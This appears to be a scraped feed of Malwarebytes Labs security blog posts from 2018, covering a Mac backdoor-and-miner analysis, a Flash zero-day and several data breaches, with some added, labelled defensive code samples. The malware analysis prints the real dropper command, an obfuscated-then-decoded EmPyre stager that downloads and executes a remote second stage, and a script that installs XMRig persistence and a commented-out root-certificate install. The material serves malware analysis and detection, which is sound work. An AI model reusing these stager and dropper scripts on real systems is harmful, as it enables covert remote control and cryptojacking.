In April of 2017, a Lithuanian man who posed as Quanta Computer, a Taiwanese electronics manufacturer, successfully conned two big names in the tech industry out of more than $100M between them. The companies eventually recovered most of the money, but not before making headlines that made readers gasp. The victims? Google and Facebook.

Tech savviness, it seems, is no longer much of a defense against a phishing lure. Desktop users already struggle to pick out a believable phish; mobile users, working with a smaller screen and more points of attack, are doubly challenged, especially against an adversary motivated enough to go after the corporate data stored on their devices.

Indeed, phishing has branched well beyond email, and commodity-level phishing protection on mobile is not enough to defend users. Becoming truly phish-proof (or close to it) requires adjustments from both man and machine: better security features in mobile devices and their apps, and users who know the red flags and how to respond to a phishing attempt.

Recommended reading:

  • “Phishing attacks on modern Android” (direct PDF link here)
  • “Social Phishing” (direct PDF link here)


The post Something else is phishy: How to detect phishing attempts on mobile appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mac malware combines EmPyre backdoor and XMRig miner

Malwarebytes - Fri, 12/07/2018 - 16:57

Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—the EmPyre backdoor and the XMRig cryptominer—for the purpose of evil.

The malware was being distributed through an application named Adobe Zii. Adobe Zii is software that is designed to aid in the piracy of a variety of Adobe applications. In this case, however, the app was called Adobe Zii, but it was definitely not the real thing.

As can be seen from the above screenshots, the actual Adobe Zii software, on the left, uses the Adobe Creative Cloud logo. (After all, if you’re going to write software to help people steal Adobe software, why not steal the logo, too?) The malware installer, however, uses a generic Automator applet icon.


Opening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script:

curl | python - & s=; curl $s/ -o; unzip -d sample; cd sample; cd __MACOSX; open -a

This script is designed to download and execute a Python script, then download and run an app named

The is simple. It appears to simply be a version of Adobe Zii, most likely for the purpose of making it appear that the malware was actually “legitimate.” (This is not to imply that software piracy is legitimate, of course, but rather it means that the malware was attempting to look like it was doing what the user thought it was intended to do.)

What about the Python script? That turned out to be obfuscated, but was easily deobfuscated, revealing the following script:

import sys;import re, subprocess;
# bail out if the Little Snitch outgoing firewall is running
cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
ps.stdout.close()
if re.search("Little Snitch", out):
    sys.exit()
# fetch the encrypted second stage from the EmPyre server (server address stripped)
import urllib2;
UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
server='';
t='/news.php';
req=urllib2.Request(server+t);
req.add_header('User-Agent',UA);
req.add_header('Cookie',"session=SYDFioywtcFbUR5U3EST96SbqVk=");
proxy = urllib2.ProxyHandler();
o = urllib2.build_opener(proxy);
urllib2.install_opener(o);
a=urllib2.urlopen(req).read();
# first 4 bytes are an IV, prepended to the staging key; the rest is RC4 ciphertext
IV=a[0:4];data=a[4:];key=IV+'3f239f68a035d40e1891d8b5fdf032d3';
S,j,out=range(256),0,[]
for i in range(256):
    j=(j+S[i]+ord(key[i%len(key)]))%256
    S[i],S[j]=S[j],S[i]
i=j=0
for char in data:
    i=(i+1)%256
    j=(j+S[i])%256
    S[i],S[j]=S[j],S[i]
    out.append(chr(ord(char)^S[(S[i]+S[j])%256]))
# run the decrypted second stage
exec(''.join(out))

The first thing this script does is look for Little Snitch, a commonly used outgoing firewall that would bring the backdoor's network connection to the user's attention. If Little Snitch is present, the malware bails out. (Of course, if an outgoing firewall like Little Snitch were installed, it would already have flagged the connection that downloaded this script in the first place, so checking at this point is worthless.)
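To make the decryption routine at the bottom of that script usable during incident response, here it is re-implemented in Python 3 as an added example (not the malware's own code and not part of the original post): the stager takes the first four bytes of the server reply as an IV, appends the hard-coded staging key, and RC4-decrypts the remainder before exec-ing it, so a /news.php response body carved out of a packet capture can be decrypted offline. The staging key is the one that appears in the deobfuscated script; the IV and second-stage text below are constructed.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (key scheduling + keystream). RC4 is symmetric, so this
    routine both encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)


# Staging key exactly as it appears in the deobfuscated script above.
STAGING_KEY = b"3f239f68a035d40e1891d8b5fdf032d3"


def decrypt_stager_response(blob: bytes, staging_key: bytes = STAGING_KEY) -> bytes:
    """Mirror the stager: IV = first 4 bytes of the reply, RC4 key = IV + staging
    key, and everything after the IV is the encrypted second stage."""
    iv, ciphertext = blob[:4], blob[4:]
    return rc4(iv + staging_key, ciphertext)


def encrypt_stager_response(iv: bytes, second_stage: bytes,
                            staging_key: bytes = STAGING_KEY) -> bytes:
    """Server side of the exchange; used here only to build a sample reply."""
    return iv + rc4(iv + staging_key, second_stage)


if __name__ == "__main__":
    # Constructed: a made-up IV and a harmless stand-in for the second stage.
    reply = encrypt_stager_response(b"\x01\x02\x03\x04", b"print('second stage')\n")
    print(reply.hex())
    print(decrypt_stager_response(reply).decode())
```

In practice the blob is the raw HTTP response body for the GET to /news.php carrying that session cookie (Wireshark's File > Export Objects > HTTP will hand it over); feed it to decrypt_stager_response and the plaintext is the agent code the backdoor executed.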

This script opens a connection to an EmPyre back end, which can push arbitrary commands to the infected Mac. Once the backdoor is open, it receives a command that downloads the following script to /private/tmp/ and executes it:

# osascript -e "do shell script \"networksetup -setsecurewebproxy "Wi-Fi" 8080 && networksetup -setwebproxy "Wi-Fi" 8080 && curl -x -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem\" with administrator privileges"
cd ~/Library/LaunchAgents
curl -o
curl -o com.proxy.initialize.plist
launchctl load -w
launchctl load -w com.proxy.initialize.plist
cd /Users/Shared
curl -o config.json
curl -o xmrig
chmod +x ./xmrig
rm -rf ./xmrig2
rm -rf ./config2.json
./xmrig -c config.json &

This script downloads and installs the other components of the malware. A launch agent named com.proxy.initialize.plist was created to keep the backdoor open persistently by running exactly the same obfuscated Python script mentioned previously.

The script also downloads the XMRig cryptominer and a config file into the /Users/Shared/ folder, and sets up a launch agent named to keep the XMRig process running with that configuration active. (The “” name is an immediate red flag that was the root cause of the discovery of this malware.)

Interestingly, there’s code in that script to download and install a root certificate associated with the mitmproxy software, which is software capable of intercepting all web traffic, including (with the aid of the certificate) encrypted “https” traffic. However, that code was commented out, indicating it was not active.
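Hunting for the persistence described above can start from the LaunchAgents directory itself. The following Python script is an added example (not part of the original post and not Malwarebytes' detection logic): it parses each launchd plist and flags agents that run an inline python command carrying decode-and-exec markers, execute anything out of /Users/Shared or a temp directory, or launch an xmrig binary. The three sample plists are constructed in a temporary directory so the script runs offline; the indicator strings are illustrative.

```python
import os
import plistlib
import tempfile

# Illustrative indicators drawn from the write-up above.
SUSPICIOUS_PATHS = ("/Users/Shared/", "/private/tmp/", "/tmp/")
STAGER_MARKERS = ("b64decode", "exec(", "urllib2")


def agent_findings(plist_path):
    """Return the reasons a launchd plist looks like malicious persistence."""
    with open(plist_path, "rb") as fh:
        plist = plistlib.load(fh)
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    if "Program" in plist:
        args = [str(plist["Program"])] + args
    if not args:
        return []
    cmd = " ".join(args)
    reasons = []
    if any(p in cmd for p in SUSPICIOUS_PATHS):
        reasons.append("executes from a shared or temp directory")
    if os.path.basename(args[0]).startswith("python") and "-c" in args:
        reasons.append("inline python command")
        if any(m in cmd for m in STAGER_MARKERS):
            reasons.append("inline python looks like a decode-and-exec stager")
    if "xmrig" in cmd.lower():
        reasons.append("xmrig miner")
    # KeepAlive on its own is normal; only report it alongside a real hit.
    if reasons and plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("kept alive at every login (RunAtLoad + KeepAlive)")
    return reasons


def scan_launch_agents(directory):
    """Map plist filename -> findings for every .plist in directory (hits only)."""
    results = {}
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            findings = agent_findings(os.path.join(directory, name))
            if findings:
                results[name] = findings
    return results


def write_sample_agents(directory):
    """Constructed samples: one ordinary agent and two modelled on this malware."""
    samples = {
        "com.example.updater.plist": {
            "Label": "com.example.updater",
            "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater"],
            "RunAtLoad": True,
        },
        "com.proxy.initialize.plist": {
            "Label": "com.proxy.initialize",
            "ProgramArguments": ["/usr/bin/python", "-c",
                                 "import sys,base64;exec(base64.b64decode('aW1wb3J0IHN5cw=='))"],
            "RunAtLoad": True,
            "KeepAlive": True,
        },
        "com.example.miner.plist": {
            "Label": "com.example.miner",
            "ProgramArguments": ["/Users/Shared/xmrig", "-c", "/Users/Shared/config.json"],
            "RunAtLoad": True,
            "KeepAlive": True,
        },
    }
    for name, plist in samples.items():
        with open(os.path.join(directory, name), "wb") as fh:
            plistlib.dump(plist, fh)


def demo():
    """Write the samples into a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_agents(tmp)
        return scan_launch_agents(tmp)


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", "; ".join(findings))
    # On a live Mac: scan_launch_agents(os.path.expanduser("~/Library/LaunchAgents"))
```

Run it against ~/Library/LaunchAgents and /Library/LaunchAgents on a suspect machine; anything it reports should be paired with a look at the referenced binary's hash and at the /Users/Shared contents before unloading the agent.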

On the surface, this malware appears to be fairly harmless. Cryptominers typically only cause the computer to slow down, thanks to a process that sucks up all the CPU/GPU.

However, this is not just a cryptominer. It’s important to keep in mind that the cryptominer was installed through a command issued by the backdoor, and there may very well have been other arbitrary commands sent to infected Macs by the backdoor in the past. It’s impossible to know exactly what damage this malware might have done to infected systems. Just because we have only observed the mining behavior does not mean it hasn’t ever done other things.


Malwarebytes for Mac detects this malware as OSX.DarthMiner. If you’re infected, it’s impossible to say what else the malware may have done besides cryptomining. It’s entirely possible it could have exfiltrated files or captured passwords.

There’s an important lesson to learn from this. Software piracy is known to be one of the riskiest activities you can undertake on your Mac. The danger of infection is high, and this is not new, yet people still engage in this behavior. Please, in the future, do yourself a favor and don’t pirate software. The costs can be far higher than purchasing the software you’re trying to get for free.

IOCs

Adobe SHA256: ebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e

The post Mac malware combines EmPyre backdoor and XMRig miner appeared first on Malwarebytes Labs.


New Flash Player zero-day used against Russian facility

Malwarebytes - Wed, 12/05/2018 - 22:44

For the past couple of years, Office documents have largely replaced exploit kits as the primary malware delivery vector, giving threat actors the choice between social engineering lures and exploits or a combination of both.

While today's malicious spam (malspam) relies heavily on macros and popular vulnerabilities (for example, CVE-2017-11882), attackers can also resort to zero-days when trying to compromise a target of interest.

In separate blog posts, Gigamon and 360 Core Security reveal how a new zero-day (CVE-2018-15982) for the Flash Player (version and earlier) was recently used in targeted attacks. Despite being a brand new vulnerability, Malwarebytes users were already protected against it thanks to our Anti-Exploit technology.

The Flash object is embedded into an Office document disguised as a questionnaire from a Moscow-based clinic.

A dot reveals an embedded (and hidden) ActiveX object

Since Flash usage in web browsers has been declining over the past few years, the preferred scenario is one where a Flash ActiveX control is embedded in an Office file. This is something we saw earlier this year with CVE-2018-4878 against South Korea.

360 Core Security identified the zero-day as a Use After Free vulnerability in a Flash package called com.adobe.tvsdk.mediacore.metadata.

ActionScript view of the malicious SWF exploit. Thanks David Ledbetter for sharing the dumped file.

Victims open the booby-trapped document from a WinRAR archive that also contains a bogus JPEG file (actually shellcode) that is used during exploitation to load a backdoor.

Exploitation flow showing the processes involved in the attack
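Since the delivery vehicle is an Office document with an embedded Flash ActiveX control, one cheap triage check is to open the OOXML container and look for the telltale parts. The Python below is an added example, not code from Gigamon, 360 Core Security or Malwarebytes: it flags activeX parts, the Shockwave Flash control CLSID, and raw SWF headers inside any zip member. The two sample documents are constructed in memory. It does not parse OLE compound streams, so control data persisted inside an activeX*.bin container is only caught if the SWF bytes are stored uncompressed there; a library such as olefile is the next step for anything deeper.

```python
import io
import re
import zipfile
import zlib

# A SWF starts with FWS (uncompressed), CWS (zlib) or ZWS (LZMA) plus a version byte.
SWF_MAGIC = re.compile(rb"[FCZ]WS[\x01-\x7f]")
# CLSID of the Shockwave Flash ActiveX control, as written into activeX*.xml.
FLASH_CLSID = b"d27cdb6e-ae6d-11cf-96b8-444553540000"


def flash_indicators(doc_bytes):
    """Return (zip member, indicator) pairs for an OOXML document (docx/xlsx/pptx)."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(doc_bytes))
    except zipfile.BadZipFile:
        return [("<file>", "not an OOXML zip container")]
    hits = []
    with zf:
        for name in zf.namelist():
            data = zf.read(name)
            if "/activex/" in name.lower():
                hits.append((name, "ActiveX part present"))
            if FLASH_CLSID in data.lower():
                hits.append((name, "Shockwave Flash CLSID"))
            if SWF_MAGIC.search(data):
                hits.append((name, "SWF header"))
    return hits


def build_sample_docx(with_flash):
    """Constructed, minimal OOXML-like container; only the parts the check reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document><w:body><w:p/></w:body></w:document>")
        if with_flash:
            zf.writestr("word/activeX/activeX1.xml",
                        '<ax:ocx ax:classid="{D27CDB6E-AE6D-11CF-96B8-444553540000}"/>')
            # zlib-compressed SWF: magic, version, uncompressed length, zlib body
            swf = b"CWS\x1e" + (1234).to_bytes(4, "little") + zlib.compress(b"\x00" * 64)
            zf.writestr("word/activeX/activeX1.bin", swf)
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("clean", build_sample_docx(False)), ("flash", build_sample_docx(True))):
        print(label, flash_indicators(doc) or "no Flash indicators")
```

An ActiveX part on its own is not malicious (plenty of forms embed controls), but the Flash CLSID or a SWF header inside a document that arrives as a questionnaire is exactly the combination this campaign relied on, and a mail gateway can quarantine on it without any knowledge of CVE-2018-15982.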

As Qihoo 360 security researchers noted, the timing of this zero-day attack is close to a recent real-world incident between Russia and Ukraine. Cyberattacks between the two countries have been going on for years and have affected major infrastructure, such as the power grid.

Malwarebytes users were already protected against this zero-day without the need to update any signatures. We detect the malware payload as Trojan.CrisisHT.APT.

Zero-day attack flow stopped by Malwarebytes

Adobe has patched this vulnerability (security bulletin APSB18-42) and it is highly recommended to apply this patch if you are still using Flash Player. Following the typical exploit-patch cycle, zero-days often become mainstream once other attackers get their hands on the code. For this reason, we can expect to see this exploit integrated into document exploit kits as well as web exploit kits in the near future.

The post New Flash Player zero-day used against Russian facility appeared first on Malwarebytes Labs.


Breaches, breaches everywhere, it must be the season

Malwarebytes - Wed, 12/05/2018 - 19:57

After last week's shocker from Marriott, this week started off with disclosures about breaches at Quora, Dunkin' Donuts, and 1-800-Flowers.

Quora

Quora is an online community that focuses on asking and answering questions. It was founded in 2009 by two former Facebook employees.

The stolen data may concern up to 100 million users of the platform and includes usernames, email addresses, and salted, hashed passwords. In some cases, data imported from other social networks and private messages on the platform may have been taken as well.

To counter future abuse of the login credentials, we advise Quora users to change their password and make sure the combination of credentials they used on Quora is not in use anywhere else. Even though Quora salted and hashed the passwords, it is not prudent to assume nobody will be able to crack them. For those in the habit of re-using passwords across different sites, please read: Why you don’t need 27 different passwords.

For those who no longer want to be registered at Quora, we also advise you to check under Settings and disconnect any and all Connected Accounts.

Quora’s official statement can be checked for further details and updates.

Dunkin’ Donuts

A threat actor managed to gain access to Dunkin' Donuts DD Perks accounts. DD Perks is a run-of-the-mill loyalty rewards program. Dunkin' Donuts says its own systems were not breached and that re-used passwords were to blame:

we’ve been informed that third parties obtained usernames and passwords through other companies’ security breaches and used this information to log into some Dunkin’ DD Perks accounts.

As a countermeasure, the company forced password resets for all the customers it believes were affected. If you are one of them, the threat actors could have learned your first and last name, email address, 16-digit DD Perks account number, and DD Perks QR code.

I repeat myself: For those that are in the habit of re-using passwords across different sites, please read: Why you don’t need 27 different passwords.
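Credential stuffing of this kind leaves a signature in the login logs that neither a brute-force attempt nor a forgetful user does: one source cycles through many distinct accounts, and most attempts fail because the leaked pairs are stale. The detector below is an added example (not Dunkin' Donuts' or Malwarebytes' code) run over a constructed log excerpt; the thresholds are illustrative, and the accounts it lists under force_reset are the ones a stuffing bot actually got into.

```python
from collections import defaultdict

# Constructed login log: timestamp, source IP, account, result.
SAMPLE_LOG = """\
2018-11-30T08:00:01Z 203.0.113.7 alice@example.com FAIL
2018-11-30T08:00:02Z 203.0.113.7 bob@example.com FAIL
2018-11-30T08:00:02Z 203.0.113.7 carol@example.com OK
2018-11-30T08:00:03Z 203.0.113.7 dave@example.com FAIL
2018-11-30T08:00:03Z 203.0.113.7 erin@example.com FAIL
2018-11-30T08:00:04Z 203.0.113.7 frank@example.com OK
2018-11-30T08:00:04Z 203.0.113.7 grace@example.com FAIL
2018-11-30T08:00:05Z 203.0.113.7 heidi@example.com FAIL
2018-11-30T08:01:10Z 198.51.100.9 ivan@example.com FAIL
2018-11-30T08:01:25Z 198.51.100.9 ivan@example.com FAIL
2018-11-30T08:01:40Z 198.51.100.9 ivan@example.com OK
2018-11-30T08:02:00Z 192.0.2.5 judy@example.com OK
"""


def parse_login_log(text):
    """Return (timestamp, ip, account, succeeded) tuples; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, ip, account, result = line.split()
            events.append((ts, ip, account.lower(), result == "OK"))
    return events


def stuffing_sources(events, min_accounts=5, max_success_rate=0.5):
    """Sources that tried many distinct accounts with a low success rate.
    A real user retyping one password never clears the first bar; a bot
    replaying a breached list fails the second because most pairs are stale."""
    per_ip = defaultdict(lambda: {"accounts": set(), "attempts": 0,
                                  "successes": 0, "hits": set()})
    for _, ip, account, ok in events:
        stats = per_ip[ip]
        stats["accounts"].add(account)
        stats["attempts"] += 1
        if ok:
            stats["successes"] += 1
            stats["hits"].add(account)
    flagged = {}
    for ip, stats in per_ip.items():
        rate = stats["successes"] / stats["attempts"]
        if len(stats["accounts"]) >= min_accounts and rate <= max_success_rate:
            flagged[ip] = {
                "distinct_accounts": len(stats["accounts"]),
                "attempts": stats["attempts"],
                "success_rate": round(rate, 2),
                "force_reset": sorted(stats["hits"]),  # accounts the bot got into
            }
    return flagged


if __name__ == "__main__":
    for ip, summary in stuffing_sources(parse_login_log(SAMPLE_LOG)).items():
        print(ip, summary)
```

The per-IP grouping is the simplest cut; stuffing tools routinely spread attempts across proxies, so a production version groups by other stable attributes as well (user agent, TLS fingerprint, ASN) and watches the global ratio of distinct accounts to successes over a sliding window.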


1-800-Flowers

The Canadian online outpost of the floral and gourmet foods gift retailer reported an incident in which a threat actor may have gained access to customer data from 75,000 Canadian orders, including names and credit card information, over a four-year period. Even though the breach did not impact any customers of its U.S. website, the company has filed a notice with the California attorney general's office.

The stolen payment information seems to include credit card numbers and all the related information: names, expiration dates, and security codes. That’s really all any seasoned criminal needs to plunder your account.

Are you afraid you may be a victim of this breach? Here's what you can do to prevent further damage:

  • Review your banking and credit card accounts for suspicious activity.
  • Consider a credit freeze if you’re concerned your financial information was compromised.
  • Watch out for breach-related scams; cybercriminals know this is a massive, newsworthy breach, so they will pounce at the chance to ensnare users through social engineering.

Or download our Data Breach Checklist here.

Is it the season?

Some of the recent breaches happened quite some time ago or have been ongoing for years, so why are they all telling us now?

Possible reasons:

  • New legislation requires companies to report breaches
  • Breaches happen all the time, but these happen to be some very serious or big ones, so the media talks about them
  • When a big breach is aired you will always see a few smaller ones, trying to hide in their shadow

If you’re a business looking for tips to prevent getting hit by a breach:
  • Invest in an endpoint protection product and data loss prevention program to make sure alerts on similar attacks get to your security staff as quickly as possible.
  • Take a hard look at your asset management program:
    • Do you have 100 percent accounting of all of your external facing assets?
    • Do you have uniform user profiles across your business for all use cases?
  • When it comes to lateral movement after an initial breach, you can’t catch what you can’t see. The first step to a better security posture is to know what you have to work with.

In a world where it seems breaches cannot be contained, consumers and businesses once again have to contend with the aftermath. Our advice to organizations: Don’t become a cautionary tale. Save your customers hassle and save your business’ reputation by taking proactive steps to secure your company today.

The post Breaches, breaches everywhere, it must be the season appeared first on Malwarebytes Labs.


New ‘Under the Radar’ report examines modern threats and future technologies

Malwarebytes - Wed, 12/05/2018 - 13:01

As if you haven’t heard it enough from us, the threat landscape is changing. It’s always changing, and usually not for the better.

The new malware we see being developed and deployed in the wild have features and techniques that allow them to go beyond what they were originally able to do, either for the purpose of additional infection or evasion of detection.

To that end, we decided to take a look at a few of these threats and pick apart what about them makes them difficult to detect, remaining just out of sight and able to silently spread across an organization.

 Download: Under the Radar: The Future of Undetected Malware

We then examine what technologies are unprepared for these threats, which modern tech is actually effective against these new threats, and finally, where the evolution of these threats might eventually lead.

The threats we discuss:

  • Emotet
  • TrickBot
  • Sorebrect
  • SamSam
  • PowerShell, as an attack vector

While discussing these threats, we also look at where they are most commonly found in the US, APAC, and EMEA regions.

Emotet 2018 detections in the United States

In doing so, we discovered interesting trends that create new questions, some of which are clear and others that need more digging. Regardless, it is evident that these threats are not old hat, but rather making bigger and bigger splashes as the year goes on, in interesting and sometimes unexpected ways.

Sorebrect ransomware detections in APAC region

Though the spread and capabilities of future threats are unknown, we have to prepare people to protect their data and experiences online. Unfortunately, many older security solutions will not be able to combat future threats, let alone what is out there now.

Not all is bad news in security, though, as we do have a lot going for us as in technological developments and innovations in modern features. For example:

  • Behavioral detection
  • Blocking at delivery
  • Self-defense modes

These features are effective at combating today’s threats and will soon be needed to build the basis for future developments, such as:

  • Artificial Intelligence being used to develop, distribute, or control malware
  • The continued development of fileless and “invisible” malware
  • Businesses becoming worm food for future malware

Download: Under the Radar: The Future of Undetected Malware

The post New ‘Under the Radar’ report examines modern threats and future technologies appeared first on Malwarebytes Labs.


Humble Bundle alerts customers to subscription reveal bug

Malwarebytes - Tue, 12/04/2018 - 17:20

You’ll want to check your mailbox if you have a Humble Bundle account, as they’re notifying some customers of a bug used to gather subscriber information.


The mail reads as follows:


Last week, we discovered someone using a bug in our code to access limited non-personal information about Humble Bundle accounts. The bug did not expose email addresses, but the person exploited it by testing a list of email addresses to see if they matched a Humble Bundle account. Your email address was one of the matches.

Now, this is the part of a breach/bug mail where you tend to say “Oh no, not again” and take a deep breath. Then you see how much of your personal information winged its way to the attacker.

Oh no, not again

For once, your name, address, and even your login details are apparently in safe hands. Either this bug didn't expose as much as the attacker was hoping for, or they were only ever after this niche slice of data.

The email continues:

Sensitive information such as your name, billing address, password, and payment information was NOT exposed. The only information they could have accessed is your Humble Monthly subscription status. More specifically, they might know if your subscription is active, inactive, or paused; when your plan expires; and if you’ve received any referral bonuses.

I should explain at this point. You can buy standalone PC games on the Humble store, or whatever book, game, or other collection happens to be on offer that week. Alternatively, you can sign up for the monthly subscription: you pay, and every month you are given a selection of video game titles. They may be good, bad, or indifferent. You might already own a few, in which case you may be able to gift them to others. If you have no interest in the upfront preview titles, you can pause your subscription for a month.

This is the data the person exploiting the bug obtained, which is an odd and very specific thing to go after.
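The bug the notice describes is account enumeration through a lookup that answers differently for known and unknown addresses. The Python below is an added example, not Humble Bundle's code: a leaky lookup handler beside a hardened one that gives every caller the same answer and delivers the real subscription status only by e-mail to the address itself, plus the probe loop an attacker would run against both. The user table, outbox and endpoint behaviour are constructed for the demonstration.

```python
import secrets

# Constructed user table (email -> subscription status) and a stand-in outbox.
USERS = {"alice@example.com": "active", "bob@example.com": "paused"}
OUTBOX = []


def send_status_email(email):
    """Out-of-band channel: only whoever controls the mailbox learns the status."""
    OUTBOX.append((email, f"Your subscription is {USERS[email]}"))


def leaky_subscription_lookup(email):
    """Vulnerable: status code and body both reveal whether an account exists,
    and on a hit they hand over the subscription state as well."""
    if email in USERS:
        return 200, {"subscription": USERS[email]}
    return 404, {"error": "no account for that address"}


def safe_subscription_lookup(email):
    """Hardened: the same response for every address; the real answer goes
    by e-mail, so a list of addresses learns nothing from this endpoint."""
    if email in USERS:
        send_status_email(email)
    return 202, {"message": "If that address has an account, we have e-mailed it."}


def probe_addresses(lookup, candidates):
    """What the attacker did: submit a list and keep every address whose
    response differs from that of an address that certainly does not exist."""
    baseline = lookup(f"nobody-{secrets.token_hex(4)}@example.com")
    return [email for email in candidates if lookup(email) != baseline]


if __name__ == "__main__":
    candidates = ["alice@example.com", "mallory@example.com", "bob@example.com"]
    print("leaky:", probe_addresses(leaky_subscription_lookup, candidates))
    print("safe: ", probe_addresses(safe_subscription_lookup, candidates))
```

Identical bodies and status codes are necessary but not sufficient: if the hardened handler sends the mail synchronously, response time still differs for real addresses, so hand the send to a queue; and rate-limit the endpoint per source, since the whole attack depends on testing a long list quickly.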

Security advice from Humble Bundle

Let’s go back to the email at this point:

Even though the information revealed is very limited, we take customer trust very seriously and wanted to promptly disclose this to you. We want to make sure you are able to protect yourself should someone use the information gathered to pose as Humble Bundle.

As a reminder, here are some tips to keep your account private and safe:

  • Don’t share your password, personal details, or payment information with anyone. We will NEVER ask for information like that.
  • Be careful of emails with links to unfamiliar sites. If you receive a suspicious email related to Humble Bundle, please contact us via our support website so that we can investigate further and warn others.
  • Enable Two-factor authentication (2FA) so that even if someone gets your password, they won’t be able to access your account. You can enable 2FA by following these instructions.

We sincerely apologize for this mistake. We will work even harder to ensure your privacy and safety in the future.

Good advice, but what’s the threat?

One could guess that the big risk here is spear phishing. An attacker could mail subscribers that their subscription is about to lapse, or claim problems with stored card details. Throw in a splash of colour text about your subscription “currently being paused,” and it will all look convincing.

Phishing is a major danger online, and we should do everything we can to thwart it. While the information exposed here isn’t as bad as it tends to be, it can still cause major headaches. Be on the lookout for dubious Humble mails, especially if they mention subscriptions. It’ll help to keep your bundle of joy from becoming a bundle of misery.

The post Humble Bundle alerts customers to subscription reveal bug appeared first on Malwarebytes Labs.


A week in security (November 26 – December 2)

Malwarebytes - Mon, 12/03/2018 - 17:06

Last week on Malwarebytes Labs, we took a look at our cybersecurity predictions for 2019, explained why Malwarebytes participated in AV testing and how we took part in a joint takedown of massive ad fraud botnets, warned that ESTA registration websites still lurk in paid ads on Google, discussed what 25 years of webcams have brought us, and reported on the Marriott breach that impacted 500 million customers.

Other cybersecurity news:
  • LinkedIn violated data protection by using 18 million email addresses of non-members to buy targeted ads on Facebook. (Source: TechCrunch)
  • Researchers created fake “master” fingerprints to unlock smartphones. (Source: Motherboard)
  • Uber slapped with £385K ICO fine for major breach. (Source: InfoSecurity Magazine)
  • Rogue developer infects widely-used NodeJS module to steal Bitcoins. (Source: The Hacker News)
  • When the FBI (and not the fraudsters) make a fake FedEx website. (Source: Graham Cluley)
  • Microsoft warns about two apps that installed root certificates then leaked the private keys. (Source: ZDNet)
  • Social media scraping app Predictim banned by Facebook and Twitter. (Source: NakedSecurity)
  • Tech support scam: Call centers shut down by Indian police in collaboration with Microsoft. (Source: TechSpot)
  • Germany detects new cyberattack targeting politicians, military, and embassies. (Source: DW)
  • It’s time to change your password again as Dell reveals attempted hack. (Source: Digital Trends)

Stay safe, everyone!

The post A week in security (November 26 – December 2) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Marriott breach impacts 500 million customers: here’s what to do about it

Malwarebytes - Fri, 11/30/2018 - 19:17

Today Marriott disclosed a large-scale data breach impacting up to 500 million customers who have stayed at a Starwood-branded hotel within the last four years. While details of the breach are still sparse, Marriott stated that there was unauthorized access to a database tied to customer reservations stretching from 2014 to September 10, 2018.

For a majority of impacted customers (approximately 327 million), the breached data includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences. For some of those guests, their credit card numbers and expiration dates were exposed; however, those were encrypted using the Advanced Encryption Standard (AES-128).

You can read more on impact to customers in Marriott’s statement here.

The root cause of the breach is currently unknown, but Marriott indicated that the intruders encrypted the information before exfiltrating it. Brian Krebs noted that Starwood had disclosed its own breach in 2015, shortly after its acquisition by Marriott. At the time, Starwood said that its breach timeline extended back one year, to roughly November 2014. Incomplete remediation of breaches is extremely common, and when compounded by the asset management challenges introduced by mergers and acquisitions, it is not unreasonable to see lateral movement and exfiltration continue long after an initial intrusion.

Starwood properties impacted are as follows:

  • Westin
  • Sheraton
  • The Luxury Collection
  • Four Points by Sheraton
  • W Hotels
  • St. Regis
  • Le Méridien
  • Aloft
  • Element
  • Tribute Portfolio
  • Design Hotels

What should you do about it? If you’re a customer:
  • Change your password for your Starwood Preferred Guest Rewards Program immediately. Random passwords generated by a password manager of your choice should be most helpful.
  • Review your banking and credit card accounts for suspicious activity.
  • Consider a credit freeze if you’re concerned your financial information was compromised.
  • Watch out for breach-related scams; cybercriminals know this is a massive, newsworthy breach so they will pounce at the chance to ensnare users through social engineering. Review emails supposedly from Marriott with an eagle eye.

If you’re a business looking for tips to prevent getting hit by a breach:
  • Invest in an endpoint protection product and data loss prevention program to make sure alerts on similar attacks get to your security staff as quickly as possible.
  • Take a hard look at your asset management program:
    • Do you have 100 percent accounting of all of your external facing assets?
    • Do you have uniform user profiles across your business for all use cases?
  • When it comes to lateral movement after an initial breach, you can’t catch what you can’t see. The first step to a better security posture is to know what you have to work with.

In a world where it seems breaches cannot be contained, consumers and businesses once again have to contend with the aftermath. Our advice to organizations: Don’t become a cautionary tale. Save your customers hassle and save your business’ reputation by taking proactive steps to secure your company today.

The post Marriott breach impacts 500 million customers: here’s what to do about it appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The 25th anniversary of the webcam: What did it bring us?

Malwarebytes - Fri, 11/30/2018 - 16:00

How did the webcam progress from a simple convenience to a worldwide security concern in 25 years?

